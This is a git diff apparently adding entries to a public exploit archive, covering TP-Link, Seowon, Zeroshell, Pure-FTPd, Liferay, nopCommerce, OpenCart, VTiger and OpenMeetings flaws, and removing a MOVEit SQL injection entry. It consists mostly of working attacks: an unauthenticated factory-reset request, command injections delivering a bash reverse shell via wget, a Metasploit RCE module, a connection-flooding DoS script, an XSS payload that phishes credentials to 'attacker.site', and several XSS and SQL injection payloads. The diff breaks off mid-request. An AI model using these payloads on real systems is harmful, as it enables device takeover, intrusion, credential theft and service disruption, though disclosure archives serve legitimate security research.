diff --git a/exploits/hardware/webapps/49092.txt b/exploits/hardware/webapps/49092.txt
new file mode 100644
index 000000000..fddb43849
--- /dev/null
+++ b/exploits/hardware/webapps/49092.txt
@@ -0,0 +1,28 @@
+# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass
+# Date: 2020/07/29
+# Exploit Author: malwrforensics
+# Vendor Homepage: https://tp-link.com
+# Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip
+# Version: TL-WA855RE(US)_V5_200415
+# Tested on: N/A
+# CVE : 2020-24363 
+Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware
+
+Details
+By default the web interface of the TL-WA855RE wireless extender require users to log in in order to access the admin interface. However, an attacker, on the same network, can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device.
+To test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password.
+
+POST /?code=5&asyn=0 HTTP/1.1
+Host: <redacted>
+Content-Length: 7
+Accept: text/plain, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0
+Content-Type: text/plain;charset=UTF-8
+Origin: http://<redacted>
+Referer: http://<redacted>
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+0|1,0,0
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49097.txt b/exploits/hardware/webapps/49097.txt
new file mode 100644
index 000000000..d3b719ca1
--- /dev/null
+++ b/exploits/hardware/webapps/49097.txt
@@ -0,0 +1,105 @@
+# Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)
+# Date: 5 Aug 2020
+# Exploit Author: maj0rmil4d
+# Vendor Homepage: http://www.seowonintech.co.kr/en/
+# Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
+# Version: 1.0.11 (Possibly all versions)
+
+ The default user/pass is admin/admin
+ your commands run as root user
+ the vulnerablity is on the ipAddr parameter in system_log.cgi
+
+ Usage:
+
+ login to the dashboard.
+ setup your listener.
+ download the revshell.txt with the RCE
+ run the revshell.txt
+
+ * here is the RCE request :
+
+POST /cgi-bin/system_log.cgi? HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
+00101 Firefox/79.0
+Accept: */*
+Accept-Language: en-US,en;q0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 183
+Origin: http://192.168.1.1
+Connection: close
+Referer: http://192.168.1.1/diagnostic.html?t201802140812
+Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
+connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
+; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
+ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
+cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
+Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
+4662; cpe_loginadmin; _lang
+
+CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
+&pingTimeout30&pingCount4&ipAddr;id&maxTTLCnt30&queriesCnt3&=
+reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
+
+
+* to get a reverse shell, setup the listener and download the file on the r=
+outer then run it .
+* the content of the revshell.txt :
+
+bash -i >& /dev/tcp/192.168.1.10/45214 0>&1
+
+* to download :
+
+
+POST /cgi-bin/system_log.cgi? HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
+00101 Firefox/79.0
+Accept: */*
+Accept-Language: en-US,en;q0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 183
+Origin: http://192.168.1.1
+Connection: close
+Referer: http://192.168.1.1/diagnostic.html?t201802140812
+Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
+connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
+; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
+ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
+cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
+Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
+4662; cpe_loginadmin; _lang
+
+CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
+&pingTimeout30&pingCount4&ipAddr;wget http://192.168.1.10/revshell=
+.txt&maxTTLCnt30&queriesCnt3&reportIpOnlyCheckboxon&btnApplyApp=
+ly&T1596644096617
+
+
+* to run it :
+
+POST /cgi-bin/system_log.cgi? HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
+00101 Firefox/79.0
+Accept: */*
+Accept-Language: en-US,en;q0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 183
+Origin: http://192.168.1.1
+Connection: close
+Referer: http://192.168.1.1/diagnostic.html?t201802140812
+Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
+connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
+; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
+ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
+cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
+Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
+4662; cpe_loginadmin; _lang
+
+CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
+&pingTimeout30&pingCount4&ipAddr;bash revshell.txt&maxTTLCnt30&=
+queriesCnt3&reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
\ No newline at end of file
diff --git a/exploits/linux/webapps/49096.rb b/exploits/linux/webapps/49096.rb
new file mode 100755
index 000000000..3dbb76d8b
--- /dev/null
+++ b/exploits/linux/webapps/49096.rb
@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Zeroshell 3.9.0 Remote Command Execution',
+      'Description'    => %q{
+        This module exploits an unauthenticated command injection vulnerability 
+        found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. 
+        As sudo is configured to execute /bin/tar without a password (NOPASSWD)
+        it is possible to run root commands using the "checkpoint" tar options.
+      },
+      'Author'         => [
+        'Juan Manuel Fernandez', # Vulnerability discovery
+        'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2019-12725'],
+        ['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
+        ['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
+      ],
+      'DisclosureDate' => 'Jul 17 2019',
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true, 
+      'Platform'       => [ 'unix', 'linux' ],
+      'Arch'           => [ ARCH_X86 ],
+      'Targets'        => [
+       ['Zeroshell 3.9.0 (x86)', {
+         'Platform'    => 'linux',
+         'Arch'        => ARCH_X86,
+        }],
+      ],
+      'DefaultTarget'  => 0,
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+      ])
+  end
+
+  def execute_command(cmd, opts = {})
+    command_payload  = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"
+
+    print_status("Sending stager payload...")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/cgi-bin/kerbynet',
+      'encode_params' => false,
+      'vars_get' => {
+        'Action' => 'x509view',
+        'Section' => 'NoAuthREQ',
+        'User' => '',
+        'x509type' => command_payload
+      }
+    )
+
+    return res
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/chmod \+x/, 'chmod 777')
+    cmd.gsub!(/;/, " %0A ")
+    cmd.gsub!(/ /, '+')
+    cmd.gsub!(/\//, '%2F')
+    return cmd
+  end
+
+  def check
+    res = execute_command('id')
+    if res && res.body.include?("uid=0(root)")
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("Exploiting...")
+    execute_cmdstager(flavor: :wget, delay: 5)
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/dos/49105.py b/exploits/multiple/dos/49105.py
new file mode 100755
index 000000000..d9dd0c2a2
--- /dev/null
+++ b/exploits/multiple/dos/49105.py
@@ -0,0 +1,99 @@
+# Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service
+# Date: 2020. nov. 26., 09:32:17 CET
+# Exploit Author: xynmaps
+# Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/
+# Software Link: https://github.com/jedisct1/pure-ftpd/
+# Version: 1.0.48
+# Tested on: Parrot Security OS 5.9.0
+
+#encoding=utf8
+#__author__ = XYN/Dump/NSKB3
+#Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3.
+"""
+Pure-FTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
+you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
+(if it's limited, just run this script from different proxies using proxychains, and it will work)
+"""
+
+import socket
+import sys
+import threading
+import subprocess
+import time
+
+banner = """
+._________________.
+|    Pure-FTPd    |
+|      D o S      |
+|_________________|
+|By XYN/DUMP/NSKB3|
+|_|_____________|_|
+|_|_|_|_____|_|_|_|
+|_|_|_|_|_|_|_|_|_|
+
+"""
+usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
+
+def test(t,p):
+	s = socket.socket()
+	s.settimeout(10)
+	try:
+		s.connect((t, p))
+		response = s.recv(65535)
+		s.close()
+		return 0
+	except socket.error:
+		print("Port {} is not open, please specify a port that is open.".format(p))
+		sys.exit()
+def attack(targ, po, id):
+	try:
+		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+		#print("Worker {} running".format(id))
+	except OSError: pass
+def main():
+	global target, port, start
+	print banner
+	try:
+		target = sys.argv[1]
+	except:
+		print usage
+		sys.exit()
+	try:
+		port = int(sys.argv[2])
+	except:
+		port = 21
+	try:
+		conns = int(sys.argv[3])
+	except:
+		conns = 50
+	print("[!] Testing if {0}:{1} is open".format(target, port))
+	test(target, port)
+	print("[+] Port {} open, starting attack...".format(port))
+	time.sleep(2)
+	print("[+] Attack started on {0}:{1}!".format(target, port))
+	def loop(target, port, conns):
+		global start
+		threading.Thread(target=timer).start()
+		while 1:
+			for i in range(1, conns + 3):
+				t = threading.Thread(target=attack, args=(target,port,i,))
+				t.start()
+				if i > conns + 2:
+					t.join()
+					break
+					loop()
+
+	t = threading.Thread(target=loop, args=(target, port, conns,))
+	t.start()
+
+def timer():
+        start = time.time()
+        while 1:
+                if start < time.time() + float(900): pass
+                else:
+                        subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+                        t = threading.Thread(target=loop, args=(target, port,))
+			t.start()
+                        break
+
+main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48855.txt b/exploits/multiple/webapps/48855.txt
deleted file mode 100644
index fbcd18c0d..000000000
--- a/exploits/multiple/webapps/48855.txt
+++ /dev/null
@@ -1,34 +0,0 @@
-# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection 
-# Google Dork: inurl:human.aspx intext:moveit
-# Date: 2020-10-05
-# Exploit Author: Aviv Beniash
-# Vendor Homepage: https://www.ipswitch.com/
-# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
-# CVE : CVE-2019-16383
-# 
-# Related Resources:
-# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
-# https://nvd.nist.gov/vuln/detail/CVE-2019-16383
-
-# Description:
-# The API call for revoking logon tokens is vulnerable to a
-# Time based blind SQL injection via the 'token' parameter
-
-# MSSQL payload:
-
-POST /api/v1/token/revoke HTTP/1.1
-Host: moveittransferstg
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 32
-
-token='; WAITFOR DELAY '0:0:10'--
-
-
-# MySQL payload:
-
-POST /api/v1/token/revoke HTTP/1.1
-Host: moveittransferstg
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 21
-
-token=' OR SLEEP(10);
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49091.txt b/exploits/multiple/webapps/49091.txt
new file mode 100644
index 000000000..f8867cee8
--- /dev/null
+++ b/exploits/multiple/webapps/49091.txt
@@ -0,0 +1,31 @@
+# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS
+# Date: 10/05/2020 
+# Exploit Author: 3ndG4me
+# Vendor Homepage: https://www.liferay.com/
+# Software Link: https://www.liferay.com/
+# Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED)
+# Tested on: Debian Linux
+# CVE : CVE-2020-7934
+# Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
+
+# NOTE: The attached proof of concept is a javascript payload,
+submitted as a ".txt" file to attach via email as ".js" is often
+blocked.
+
+// CVE-2020-7934 Cred Phishing Example Attack
+// Author: 3ndG4me
+// Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
+
+// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant:
+// <SCRIPT SRC="//attacker.site/cve-2020-7934.js">
+
+var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", "");
+var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", "");
+
+
+console.log(email);
+console.log(password);
+
+var url = "http://attacker.site/" + email + ":" + password;
+
+$.get(url);
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49093.txt b/exploits/multiple/webapps/49093.txt
new file mode 100644
index 000000000..5703b5153
--- /dev/null
+++ b/exploits/multiple/webapps/49093.txt
@@ -0,0 +1,42 @@
+# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting
+# Date: 24-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.nopcommerce.com/
+# Version: 4.30
+# Tested on: Windows 10/Kali Linux
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Schedule tasks and each time any user will go to that page of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Schedule tasks.
+
+Steps-To-Reproduce:
+1. Go to the nopCommerce Store admin page.
+2. Now go to the System-Schedule tasks option.
+3. Now click to on edit button on any task.
+4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>"
+5. Now click on Update button.
+6. The XSS will be triggered.
+
+POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Content-Length: 335
+Accept: application/json, text/javascript, */*; q=0.01
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: 127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: 127.0.0.1/Admin/ScheduleTask/List
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: xyz
+
+Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49094.txt b/exploits/multiple/webapps/49094.txt
new file mode 100644
index 000000000..d27e40d9f
--- /dev/null
+++ b/exploits/multiple/webapps/49094.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
+# Google Dork: "Apache OpenMeetings DOS"
+# Date: 2020-08-28
+# Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research)
+# Vendor Homepage: https://openmeetings.apache.org/
+# Software Link: https://openmeetings.apache.org/
+# Version: 4.0.0 - 5.0.0
+# Tested on: Windows
+# CVE: CVE-2020-13951
+
+- POC:
+# Vulnerability variable: hostname
+# Payload: x.x.x.x;ls
+# Request exploit:
+
+GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026
+
+- Reference: 
+https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E
+https://nvd.nist.gov/vuln/detail/CVE-2020-13951
\ No newline at end of file
diff --git a/exploits/php/webapps/49090.txt b/exploits/php/webapps/49090.txt
new file mode 100644
index 000000000..59636567d
--- /dev/null
+++ b/exploits/php/webapps/49090.txt
@@ -0,0 +1,282 @@
+# Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS
+# Date: 2020-11-18
+# Exploit Vulnerability-Lab
+# Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/
+# Software Link: https://sourceforge.net/projects/vtigercrm/files/
+# Version: v7.0
+
+Document Title:
+===============
+VTiger v7.0 CRM - (To) Persistent Email Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2227
+
+
+Release Date:
+=============
+2020-11-18
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2227
+
+
+Common Vulnerability Scoring System:
+====================================
+4.8
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Vtiger CRM is web-application built using PHP. Choose the best CRM for
+your business. Custom Module & Relationship builder for
+VTiger is a very useful extension that allows crm administrators to
+create custom modules within few clicks. All custom modules
+are created following strict VTiger standards. In addition, the
+relationship builder allows crm admin to link together existing modules
+as well as new custom modules.
+
+(Copy of the Homepage:
+https://www.vtiger.com/open-source-crm/download-open-source/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent
+cross site vulnerability in the VTiger v7.0 CRM open-source web-application.
+
+
+Affected Product(s):
+====================
+VTExperts
+Product: VTiger v7.0 - CRM (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-27: Public Disclosure (Vulnerability Laboratory)
+2020-04-28: Researcher Notification & Coordination (Security Researcher)
+2020-04-29: Vendor Notification 1 (Security Department)
+2020-05-30: Vendor Notification 2 (Security Department)
+2020-06-22: Vendor Notification 3 (Security Department)
+****-**-**: Vendor Response/Feedback (Security Department)
+****-**-**: Vendor Fix/Patch (Service Developer Team)
+****-**-**: Security Acknowledgements (Security Department)
+2020-11-18: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official VTiger v7.0 CRM open-source web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent cross site scripting web vulnerability is located in the
+`searchValue` Parameter of the `Emails Compose` module.
+Attackers are able to inject own mlicious script code in the `To` sender
+input field of the email compose module to attack other
+user accounts. The email can be delivered with multiple receipients
+which allows an attacker to insert the target email and a
+malicious payload. The request method to inject is GET via searchValue
+and POST on compose with persistent attack vector.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Request Method(s):
+[+] POST
+[+] GET
+
+Vulnerable Module(s):
+[+] Email Compose (index.php?module=Emails)
+
+Vulnerable Input(s):
+[+] To (Sender - Email)
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by
+remote attackers with low privileged account and with low user interaction.
+For security demonstration or to reproduce the cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Url
+http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY#
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the web-application ui
+2. Login with a regular user role to the ui
+3. Open vendors and move to compose to email form
+4. Inject malicious payload as "to" sender information and as well a
+valid email to target
+5. Send the request after the compose
+6. Wait until the administrator or higher privileged targeted users
+click in the email or receives the email on preview
+7. Successful reproduce of the cross site scripting web vulnerability!
+
+
+PoC: Vulnerable Source (Execution Point)
+<div class="col-lg-12"><div class="col-lg-2"><span
+class="pull-right">To&nbsp;<span class="redColor">*</span></span></div>
+<div class="col-lg-6"><div class="select2-container
+select2-container-multi autoComplete sourceField select2"
+id="s2id_emailField" style="width: 100%;"><ul class="select2-choices
+ui-sortable">  <li class="select2-search-choice">
+<div>IT <b>(test@test.com)</b></div>    <a href="#"
+class="select2-search-choice-close" tabindex="-1"></a></li>
+<li class="select2-search-choice"><div><iframe src"evil.source"
+onload=alert(document.cookie)></div></iframe></div>
+
+
+--- PoC Session Logs [GET] ---
+http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=>"<iframe+src%3Da+onload%3Dalert(document.cookie)>&_=1587844428851
+Host: localhost:8080
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Referer:
+http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
+Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.10 (Debian)
+Content-Length: 28
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+-
+Content-Type: text/json; charset=UTF-8
+http://localhost:8080/vtigercrm/evil.source
+Host: localhost:8080
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer:
+http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
+Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.10
+Content-Length: 299
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=iso-8859-1
+
+
+Reference(s):
+http://localhost:8080/vtigercrm/
+http://localhost:8080/vtigercrm/index.php
+http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=
+
+
+Security Risk:
+==============
+The security risk of the persistent web vulnerability i the
+web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/49098.txt b/exploits/php/webapps/49098.txt
new file mode 100644
index 000000000..d893e0108
--- /dev/null
+++ b/exploits/php/webapps/49098.txt
@@ -0,0 +1,20 @@
+# Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting (Authenticated)
+# Date: 24-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: 3.0.3.6
+# Tested on: Windows 10/Kali Linux
+
+Vulnerable Parameters: Profile Image.
+
+Steps-To-Reproduce:
+1. Go to the opencart admin page.
+
+2. Now go to the profile page.
+
+* Before the next step write this in notepad ""><svg onload=alert("XSS")>" and save it as an payload.png
+
+3. Now edit the image and uplaod the image as payload.png.
+
+4. The XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49099.txt b/exploits/php/webapps/49099.txt
new file mode 100644
index 000000000..63cf898bc
--- /dev/null
+++ b/exploits/php/webapps/49099.txt
@@ -0,0 +1,43 @@
+# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
+# Date: 24-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: 3.0.3.6
+# Tested on: Windows 10/Kali Linux
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Subject of mail.
+
+Steps-To-Reproduce:
+1. Go to the opencart admin page.
+2. Now go to the Marketing-Mail option.
+3. Put the below payload in subject field of the Mail
+: "<script>alert(123)</script>"
+5. Now click on send button.
+6. The XSS will be triggered.
+
+POST /admin/index.php?route=marketing/contact/send&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5 HTTP/1.1
+Host: localhost
+Connection: close
+Content-Length: 206
+Accept: application/json, text/javascript, */*; q=0.01
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
